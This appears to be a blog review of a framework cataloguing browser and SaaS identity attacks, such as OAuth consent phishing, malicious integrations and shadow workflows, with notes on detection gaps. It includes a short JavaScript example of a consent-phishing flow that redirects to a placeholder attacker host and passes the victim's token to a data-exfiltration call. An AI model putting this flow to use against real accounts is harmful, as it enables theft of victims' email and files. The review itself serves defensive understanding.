Inside the Browser Identity Attacks Matrix: A New Framework for SaaS Security

Hook

Your firewall, EDR, and network monitoring won't catch the next generation of attacks—because they're not going through your network at all. Welcome to networkless attacks.

Context

Traditional security architectures assume a clear perimeter: attackers come through the network, exploit endpoints, and move laterally through infrastructure you control. But the shift to SaaS has fundamentally broken this model. When your employees authenticate to Salesforce, Google Workspace, or GitHub from coffee shops, home networks, or personal devices, the corporate network isn't even in the picture. OAuth tokens flow directly between browsers and cloud providers. SAML assertions authenticate users without touching your infrastructure. Browser sessions persist across networks and devices.

This reality creates a massive blind spot. Push Security's Browser Identity Attacks Matrix emerged from this gap—a comprehensive framework documenting how adversaries exploit browser sessions, identity protocols, and SaaS platforms themselves. Presented at Microsoft BlueHat and inspired by MITRE ATT&CK's structure, the matrix catalogs techniques that security teams trained on network defense often miss entirely. It's not just theoretical: these are attacks happening in production environments, bypassing millions of dollars in traditional security tooling.

Technical Insight

The matrix organizes attacks across familiar MITRE ATT&CK stages—Reconnaissance, Initial Access, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, and Impact—but the techniques themselves look nothing like traditional network attacks.

Consider the 'OAuth Consent Phishing' technique under Initial Access. Traditional phishing tries to steal credentials, but OAuth consent attacks are more elegant. An attacker creates a malicious application and registers it with a legitimate OAuth provider (Azure AD, Google, Okta). When a victim clicks a crafted link, they see a real OAuth consent screen from their actual identity provider asking for permissions like 'Read your email' or 'Access your files.' The application name might be '0ffice 365 Document Viewer' or something similarly deceptive. The user grants consent, and the attacker receives a valid OAuth token—no credentials stolen, no malware installed, no network traffic to detect. Here's what the attack flow looks like:

// Attacker's malicious OAuth application redirect
const maliciousAuthUrl = 
  'https://login.microsoftonline.com/common/oauth2/v2.0/authorize?' +
  'client_id=<attacker-controlled-app-id>' +
  '&response_type=code' +
  '&redirect_uri=https://attacker-controlled.com/callback' +
  '&scope=Mail.Read Files.ReadWrite.All' +
  '&state=phishing_campaign_123';

// Victim clicks link, sees legitimate Microsoft login page
// After consent, attacker receives valid token
app.get('/callback', async (req, res) => {
  const authCode = req.query.code;
  const tokenResponse = await exchangeCodeForToken(authCode);
  // tokenResponse.access_token is now valid for victim's account
  // No credentials stolen, no malware, pure OAuth abuse
  await exfiltrateData(tokenResponse.access_token);
});

The matrix excels at documenting these multi-stage attacks. For persistence, it covers techniques like 'Evil Twin Integrations'—where attackers create SaaS-to-SaaS integrations that look legitimate but exfiltrate data continuously. In Salesforce, for instance, an attacker with initial access might create a Connected App that syncs 'customer data for analytics' but actually feeds it to attacker infrastructure. The integration persists even if the initial access vector is discovered and remediated.

The 'Shadow Workflow' technique under Defense Evasion is particularly insidious. Modern SaaS platforms like Slack, Microsoft Power Automate, or Zapier allow users to create workflows that move data between systems. An attacker creates a workflow that appears benign—maybe 'Archive important messages to Google Drive'—but configures the destination to be an attacker-controlled Drive account. Security teams reviewing OAuth permissions might see 'Google Drive integration' and consider it normal business activity.

What makes the matrix architecturally valuable is its mapping of detection gaps. Each technique documents what traditional controls miss:

## Detection Challenges
- **Network security**: No malicious network traffic to corporate resources
- **Endpoint security**: Attacks execute entirely in browser, no malware
- **IAM logs**: OAuth consent appears as legitimate user authorization
- **CASB**: May see API calls but they're from 'authorized' applications

The repository structure mirrors MITRE ATT&CK with Markdown files for each technique containing: description, real-world examples, prerequisites, procedure, detection opportunities, and mitigation strategies. This standardization makes it possible to build security programs around the matrix—mapping your detective controls to specific techniques, identifying coverage gaps, and prioritizing investments.

For red teams, the matrix provides a structured approach to SaaS penetration testing. Instead of ad-hoc testing, you can systematically evaluate an organization's defenses across all documented techniques. For blue teams, it's a gap analysis framework: which of these 40+ techniques could we actually detect? Which could we prevent? Where are we completely blind?

Gotcha

The matrix is explicitly 'work in progress,' and you'll encounter incomplete sections, missing references, and techniques that need more real-world examples. Some techniques are well-documented with detailed procedures, while others are stubs waiting for expansion. This inconsistency means you can't rely on it as a complete reference yet—you'll need to supplement with your own research for certain attack vectors.

More fundamentally, this is a documentation project, not a toolkit. If you're expecting ready-to-use exploits or automated attack tools, you'll be disappointed. The matrix tells you how OAuth consent phishing works conceptually, but you'll need to build (or find) your own tooling to execute it. For practitioners wanting to test these techniques against their own environments, you'll need to combine this matrix with repositories like AADInternals for Azure AD attacks, or develop custom tooling based on the documented procedures. The value is in the framework and knowledge, not in operational tooling.

Verdict

Use if: You're building or evaluating security programs for SaaS-heavy organizations and need to understand attack vectors that traditional network/endpoint security completely misses. This is essential reading for security architects designing detection strategies for OAuth abuse, SAML attacks, and browser-based threats. Red teams will find it valuable for structuring SaaS penetration tests beyond the typical 'try to phish credentials' approach, while blue teams can use it to identify blind spots in their current security stack. It's particularly relevant if you're evaluating CASB, SSPM, or browser security solutions and need to understand what threats they should actually address. Skip if: You need production-ready offensive tools rather than technique documentation, or if your threat model centers on traditional infrastructure attacks. Organizations still primarily using on-premises applications won't find as much immediate value here. Also skip if you want a finished, comprehensive reference—the work-in-progress nature means you'll encounter gaps that require independent research to fill.